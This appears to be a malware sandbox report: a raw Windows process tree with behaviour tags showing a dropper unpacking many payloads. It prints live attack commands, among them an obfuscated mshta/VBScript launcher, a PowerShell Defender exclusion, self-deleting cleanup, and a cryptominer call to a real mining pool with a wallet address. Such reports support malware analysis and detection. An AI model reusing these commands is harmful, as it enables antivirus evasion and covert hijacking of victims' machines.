- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\4353358.exe"C:\ProgramData\4353358.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5124 -s 23085⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\ProgramData\6653743.exe"C:\ProgramData\6653743.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: SetClipboardViewer
-
-
C:\ProgramData\267711.exe"C:\ProgramData\267711.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\267711.exe"C:\ProgramData\267711.exe"5⤵
-
-
C:\ProgramData\267711.exe"C:\ProgramData\267711.exe"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5300 -s 10845⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\ProgramData\3839424.exe"C:\ProgramData\3839424.exe"4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBSCrIPt: close ( crEateobJeCt ("wsCRIpT.sHEll" ). RUN ( "C:\Windows\system32\cmd.exe /q /C cOPy /Y ""C:\ProgramData\3839424.exe"" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 & If """"== """" for %l In ( ""C:\ProgramData\3839424.exe"") do taskkill -Im ""%~nxl"" /F " , 0 , TRuE) )5⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /q /C cOPy /Y "C:\ProgramData\3839424.exe" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 & If ""== "" for %l In ( "C:\ProgramData\3839424.exe") do taskkill -Im "%~nxl" /F6⤵
-
C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exEC3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw97⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBSCrIPt: close ( crEateobJeCt ("wsCRIpT.sHEll" ). RUN ( "C:\Windows\system32\cmd.exe /q /C cOPy /Y ""C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE"" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 & If ""-P48RT5mWbqdvVNE0ZvDVppXXBhLw9 ""== """" for %l In ( ""C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE"") do taskkill -Im ""%~nxl"" /F " , 0 , TRuE) )8⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /q /C cOPy /Y "C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 & If "-P48RT5mWbqdvVNE0ZvDVppXXBhLw9 "== "" for %l In ( "C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE") do taskkill -Im "%~nxl" /F9⤵
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" .\zyYHQ.U,xGNjygcjY8⤵
- Loads dropped DLL
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -Im "3839424.exe" /F7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
-
C:\ProgramData\8149311.exe"C:\ProgramData\8149311.exe"4⤵
- Executes dropped EXE
- Drops file in Windows directory
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4004 -s 24245⤵
- Program crash
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5416 -s 6044⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Users\Admin\AppData\Local\Temp\udptest.exe"C:\Users\Admin\AppData\Local\Temp\udptest.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5516 -s 3164⤵
- Program crash
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-F46AH.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-F46AH.tmp\setup_2.tmp" /SL5="$2016C,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-1647K.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-1647K.tmp\setup_2.tmp" /SL5="$20232,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT6⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\is-C1NQM.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-C1NQM.tmp\postback.exe" ss17⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe" -a4⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 2432 -ip 24321⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 468 -ip 4681⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 728 -ip 7281⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 1008 -ip 10081⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 5168 -ip 51681⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 1156 -ip 11561⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 624 -p 5264 -ip 52641⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 5416 -ip 54161⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5300 -ip 53001⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 5516 -ip 55161⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4140 -s 4522⤵
- Program crash
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4140 -ip 41401⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 604 -p 3308 -ip 33081⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 624 -p 5124 -ip 51241⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 5720 -ip 57201⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4004 -ip 40041⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 4040 -ip 40401⤵
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding BB8A278A3533554178208221D74EC3F4 C2⤵
- Loads dropped DLL
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding CDA5D797A60230F1EAAE0CF62661FAD32⤵
- Blocklisted process makes network request
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f3⤵
- Kills process with taskkill
-
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding F38EB4D4D59C5E32367E4083ED6D5BB8 E Global\MSI00002⤵
- Loads dropped DLL
- Drops file in Windows directory
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding C7C950DF259E471A0B75A5BE32D5109F C2⤵
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 934D2E1CFDE28E5D5ED5DEA4DE3640F32⤵
- Blocklisted process makes network request
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"2⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe" -silent=1 -CID=717 -SID=717 -submn=default3⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" "--anbfs"4⤵
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 5500 -ip 55001⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4960 -s 4522⤵
- Program crash
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4960 -ip 49601⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\cmd.execmd /c cmd < Nobile.docm1⤵
-
C:\Windows\SysWOW64\cmd.execmd2⤵
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^mFzuIhvmvbdHpfegBQvdRBWtkZruqmiMQZvPfzkmbfdsclZwZBnIIvmXJgVJldnWdERlThYiFXSCkFJqZwimwmrxmnuwnBfiQxqRzPi$" Vederlo.docm3⤵
-
-
C:\Windows\SysWOW64\PING.EXEping localhost3⤵
- Runs ping.exe
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rimasta.exe.comRimasta.exe.com J3⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rimasta.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rimasta.exe.com J4⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rimasta.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rimasta.exe.com J5⤵
- Suspicious use of SetThreadContext
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RegAsm.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RegAsm.exe6⤵
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd" /c cmd < Ottobre.wmz1⤵
-
C:\Windows\SysWOW64\cmd.execmd2⤵
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^YoaQNWwVIzCSbXszQuyEXVpLSTOivXJfbuzhGDXVppMmHfNMRolljQxeYHXToUmKJjxdErNjplcOpJrDuwdhMmeGMdgYGrNgJwPxUvo$" Fimo.wmz3⤵
-
-
C:\Windows\SysWOW64\PING.EXEping localhost3⤵
- Runs ping.exe
-
-
C:\Users\Admin\AppData\Roaming\Ideale.exe.comIdeale.exe.com N3⤵
-
C:\Users\Admin\AppData\Roaming\Ideale.exe.comC:\Users\Admin\AppData\Roaming\Ideale.exe.com N4⤵
-
C:\Users\Admin\AppData\Roaming\Ideale.exe.comC:\Users\Admin\AppData\Roaming\Ideale.exe.com N5⤵
-
C:\Users\Admin\AppData\Roaming\Ideale.exe.comC:\Users\Admin\AppData\Roaming\Ideale.exe.com N6⤵
-
C:\Users\Admin\AppData\Roaming\Ideale.exe.comC:\Users\Admin\AppData\Roaming\Ideale.exe.com N7⤵
-
C:\Users\Admin\AppData\Roaming\Ideale.exe.comC:\Users\Admin\AppData\Roaming\Ideale.exe.com N8⤵
-
C:\Users\Admin\AppData\Roaming\Ideale.exe.comC:\Users\Admin\AppData\Roaming\Ideale.exe.com N9⤵
-
C:\Users\Admin\AppData\Roaming\Ideale.exe.comC:\Users\Admin\AppData\Roaming\Ideale.exe.com N10⤵
-
C:\Users\Admin\AppData\Roaming\Ideale.exe.comC:\Users\Admin\AppData\Roaming\Ideale.exe.com N11⤵
-
C:\Users\Admin\AppData\Roaming\Ideale.exe.comC:\Users\Admin\AppData\Roaming\Ideale.exe.com N12⤵
-
C:\Users\Admin\AppData\Roaming\Ideale.exe.comC:\Users\Admin\AppData\Roaming\Ideale.exe.com N13⤵
-
C:\Users\Admin\AppData\Roaming\Ideale.exe.comC:\Users\Admin\AppData\Roaming\Ideale.exe.com N14⤵
-
C:\Users\Admin\AppData\Roaming\Ideale.exe.comC:\Users\Admin\AppData\Roaming\Ideale.exe.com N15⤵
-
C:\Users\Admin\AppData\Roaming\Ideale.exe.comC:\Users\Admin\AppData\Roaming\Ideale.exe.com N16⤵
-
C:\Users\Admin\AppData\Roaming\Ideale.exe.comC:\Users\Admin\AppData\Roaming\Ideale.exe.com N17⤵
-
C:\Users\Admin\AppData\Roaming\Ideale.exe.comC:\Users\Admin\AppData\Roaming\Ideale.exe.com N18⤵
-
C:\Users\Admin\AppData\Roaming\Ideale.exe.comC:\Users\Admin\AppData\Roaming\Ideale.exe.com N19⤵
-
C:\Users\Admin\AppData\Roaming\Ideale.exe.comC:\Users\Admin\AppData\Roaming\Ideale.exe.com N20⤵
-
C:\Users\Admin\AppData\Roaming\Ideale.exe.comC:\Users\Admin\AppData\Roaming\Ideale.exe.com N21⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\Ideale.exe.comC:\Users\Admin\AppData\Roaming\Ideale.exe.com N22⤵
-
C:\Users\Admin\AppData\Roaming\Ideale.exe.comC:\Users\Admin\AppData\Roaming\Ideale.exe.com N23⤵
-
C:\Users\Admin\AppData\Roaming\Ideale.exe.comC:\Users\Admin\AppData\Roaming\Ideale.exe.com N24⤵
-
C:\Users\Admin\AppData\Roaming\Ideale.exe.comC:\Users\Admin\AppData\Roaming\Ideale.exe.com N25⤵
-
C:\Users\Admin\AppData\Roaming\Ideale.exe.comC:\Users\Admin\AppData\Roaming\Ideale.exe.com N26⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Users\Admin\AppData\Roaming\Ideale.exe.comC:\Users\Admin\AppData\Roaming\Ideale.exe.com N27⤵
-
C:\Users\Admin\AppData\Roaming\Ideale.exe.comC:\Users\Admin\AppData\Roaming\Ideale.exe.com N28⤵
-
C:\Users\Admin\AppData\Roaming\Ideale.exe.comC:\Users\Admin\AppData\Roaming\Ideale.exe.com N29⤵
-
C:\Users\Admin\AppData\Roaming\Ideale.exe.comC:\Users\Admin\AppData\Roaming\Ideale.exe.com N30⤵
-
C:\Users\Admin\AppData\Roaming\Ideale.exe.comC:\Users\Admin\AppData\Roaming\Ideale.exe.com N31⤵
-
C:\Users\Admin\AppData\Roaming\Ideale.exe.comC:\Users\Admin\AppData\Roaming\Ideale.exe.com N32⤵
-
C:\Users\Admin\AppData\Roaming\Ideale.exe.comC:\Users\Admin\AppData\Roaming\Ideale.exe.com N33⤵
-
C:\Users\Admin\AppData\Roaming\Ideale.exe.comC:\Users\Admin\AppData\Roaming\Ideale.exe.com N34⤵
-
C:\Users\Admin\AppData\Roaming\Ideale.exe.comC:\Users\Admin\AppData\Roaming\Ideale.exe.com N35⤵
-
C:\Users\Admin\AppData\Roaming\Ideale.exe.comC:\Users\Admin\AppData\Roaming\Ideale.exe.com N36⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Ideale.exe.comC:\Users\Admin\AppData\Roaming\Ideale.exe.com N37⤵
-
C:\Users\Admin\AppData\Roaming\Ideale.exe.comC:\Users\Admin\AppData\Roaming\Ideale.exe.com N38⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Ideale.exe.comC:\Users\Admin\AppData\Roaming\Ideale.exe.com N39⤵
-
C:\Users\Admin\AppData\Roaming\Ideale.exe.comC:\Users\Admin\AppData\Roaming\Ideale.exe.com N40⤵
-
C:\Users\Admin\AppData\Roaming\Ideale.exe.comC:\Users\Admin\AppData\Roaming\Ideale.exe.com N41⤵
-
C:\Users\Admin\AppData\Roaming\Ideale.exe.comC:\Users\Admin\AppData\Roaming\Ideale.exe.com N42⤵
-
C:\Users\Admin\AppData\Roaming\Ideale.exe.comC:\Users\Admin\AppData\Roaming\Ideale.exe.com N43⤵
-
C:\Users\Admin\AppData\Roaming\Ideale.exe.comC:\Users\Admin\AppData\Roaming\Ideale.exe.com N44⤵
-
C:\Users\Admin\AppData\Roaming\Ideale.exe.comC:\Users\Admin\AppData\Roaming\Ideale.exe.com N45⤵
-
C:\Users\Admin\AppData\Roaming\Ideale.exe.comC:\Users\Admin\AppData\Roaming\Ideale.exe.com N46⤵
-
C:\Users\Admin\AppData\Roaming\Ideale.exe.comC:\Users\Admin\AppData\Roaming\Ideale.exe.com N47⤵
-
C:\Users\Admin\AppData\Roaming\Ideale.exe.comC:\Users\Admin\AppData\Roaming\Ideale.exe.com N48⤵
-
C:\Users\Admin\AppData\Roaming\Ideale.exe.comC:\Users\Admin\AppData\Roaming\Ideale.exe.com N49⤵
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Helper.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Helper.exe1⤵
- Checks BIOS information in registry
- Loads dropped DLL
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6212 -s 11642⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
C:\Windows\SysWOW64\dllhost.exedllhost.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 6212 -ip 62121⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 2324 -ip 23241⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 6036 -ip 60361⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 5996 -ip 59961⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 4056 -ip 40561⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 672 -p 4780 -ip 47801⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 696 -p 2016 -ip 20161⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 1548 -ip 15481⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\36CB.exeC:\Users\Admin\AppData\Local\Temp\36CB.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7020 -s 2882⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
C:\Users\Admin\AppData\Local\Temp\4563.exeC:\Users\Admin\AppData\Local\Temp\4563.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\4563.exe"C:\Users\Admin\AppData\Local\Temp\4563.exe"2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\4563.exe"C:\Users\Admin\AppData\Local\Temp\4563.exe"2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\4563.exe"C:\Users\Admin\AppData\Local\Temp\4563.exe"2⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7316 -s 10922⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 564 -p 2496 -ip 24961⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 180 -p 7316 -ip 73161⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\5717.exeC:\Users\Admin\AppData\Local\Temp\5717.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5944 -s 3122⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 7884 -ip 78841⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 7020 -ip 70201⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\7B1B.exeC:\Users\Admin\AppData\Local\Temp\7B1B.exe1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\90C6.exeC:\Users\Admin\AppData\Local\Temp\90C6.exe1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c rd /s /q C:\Users\Admin\AppData\Local\Temp\hlHnTMreVNj & timeout 4 & del /f /q "C:\Users\Admin\AppData\Local\Temp\90C6.exe"2⤵
-
C:\Windows\SysWOW64\timeout.exetimeout 43⤵
- Delays execution with timeout.exe
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 5944 -ip 59441⤵
-
C:\Users\Admin\AppData\Local\Temp\9A5D.exeC:\Users\Admin\AppData\Local\Temp\9A5D.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\9A5D.exeC:\Users\Admin\AppData\Local\Temp\9A5D.exe2⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Users\Admin\AppData\Local\Temp\9A5D.exeC:\Users\Admin\AppData\Local\Temp\9A5D.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\filename.exe"C:\Users\Admin\AppData\Local\Temp\filename.exe"3⤵
- Checks BIOS information in registry
- Drops startup file
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\ProgramData4⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
-
-
C:\ProgramData\Systemd\Database.exe-epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth4⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\ProgramData\Systemd\Database.exe-epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth4⤵
- Checks BIOS information in registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\ProgramData\Systemd\Database.exe-epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth4⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\ProgramData\Systemd\Database.exe-epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth4⤵
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
